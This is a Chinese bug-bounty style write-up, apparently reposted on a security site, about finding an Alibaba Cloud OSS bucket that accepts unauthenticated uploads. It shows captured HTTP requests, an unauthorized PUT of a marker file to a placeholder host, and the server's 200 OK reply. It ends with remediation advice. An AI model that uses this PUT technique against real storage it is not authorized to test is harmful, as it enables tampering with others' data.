一次OSS存储桶的任意数据上传挖掘

admin
admin
admin
138359
文章
113
评论
2025年2月5日23:12:31评论11 views字数 2478阅读8分15秒阅读模式

 

第一步:识别目标

在随意浏览目标网站时,我遇到了一个 403 Forbidden 响应。

一次OSS存储桶的任意数据上传挖掘img

第二步:技术检测

我使用 Wappalyzer 浏览器扩展来分析目标所使用的技术。结果显示,该网站正在使用 阿里云对象存储服务(OSS)

一次OSS存储桶的任意数据上传挖掘img

第三步:捕获请求

我启动了 Burp Suite,捕获了请求并将其发送到 Repeater。以下是捕获的请求:

GET / HTTP/1.1Host: target.comSec-Ch-Ua: "Not/A)Brand";v="8", "Chromium";v="126"Sec-Ch-Ua-Mobile: ?0Sec-Ch-Ua-Platform: "Windows"Accept-Language: en-USUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.183 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brPriority: u=0, iConnection: keep-alive

第四步:观察响应

我收到以下响应:

HTTP/1.1 403 ForbiddenServer: AliyunOSSDate: Sat, 01 Feb 2025 12:33:50 GMTContent-Type: application/xmlContent-Length: 366Connection: keep-alivex-oss-request-id: 679E14AEB630023931679926x-oss-server-time: 18x-oss-ec: 0003-00000905<?xml version="1.0" encoding="UTF-8"?><Error> <Code>AccessDenied</Code> <Message>The bucket you access does not belong to you.</Message> <RequestId>

一次OSS存储桶的任意数据上传挖掘img

第五步:测试 PUT 方法

由于收到 403 Forbidden 响应,我决定测试是否允许 PUT 请求。我对请求进行了如下修改:

PUT /poc.json HTTP/1.1Host: target.comSec-Ch-Ua: "Not/A)Brand";v="8", "Chromium";v="126"Sec-Ch-Ua-Mobile: ?0Sec-Ch-Ua-Platform: "Windows"Accept-Language: en-USUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.183 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brPriority: u=0, iConnection: keep-aliveContent-Length: 32{"id": "hacked-by-waseem"}

一次OSS存储桶的任意数据上传挖掘img

第六步:收到 200 OK 响应

令我惊讶的是,我收到了 200 OK 响应,这表明我的数据已成功上传!

HTTP/1.1 200 OKServer: AliyunOSSDate: Sat, 01 Feb 2025 12:38:20 GMTContent-Length: 0Connection: keep-alivex-oss-request-id: 679E15BC51C5F932386122A0ETag: "1650257635488786160B4C064076B0A1"x-oss-hash-crc64ecma: 14149601074129124870Content-MD5: FlAldjVIh4YWC0wGQHawoQ==x-oss-server-time: 25

第七步:验证数据访问

随后,我尝试访问上传的 poc.json 文件,并成功检索到了存储的数据。

一次OSS存储桶的任意数据上传挖掘img

结论

阿里云对象存储服务(OSS) 的此类错误配置允许未授权用户上传数据,可能导致严重的安全风险,例如:

未授权的数据存储

覆盖敏感文件

潜在的数据泄露

建议

为了防止此类漏洞,应采取以下措施:

1.限制公共访问: 确保只有经过身份验证的用户才能上传数据。

2.正确配置 ACL(访问控制列表): 仅授予授权用户适当的权限。

3.监控日志: 定期检查日志,检测未授权的 PUT 请求。

4.启用身份验证: 对所有云存储操作强制要求身份验证。

声明:⽂中所涉及的技术、思路和⼯具仅供以安全为⽬的的学习交流使⽤,任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的,否则后果⾃⾏承担。

原文始发于微信公众号(白帽子左一):一次OSS存储桶的任意数据上传挖掘

 

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年2月5日23:12:31
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   一次OSS存储桶的任意数据上传挖掘http://cn-sec.com/archives/3701441.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息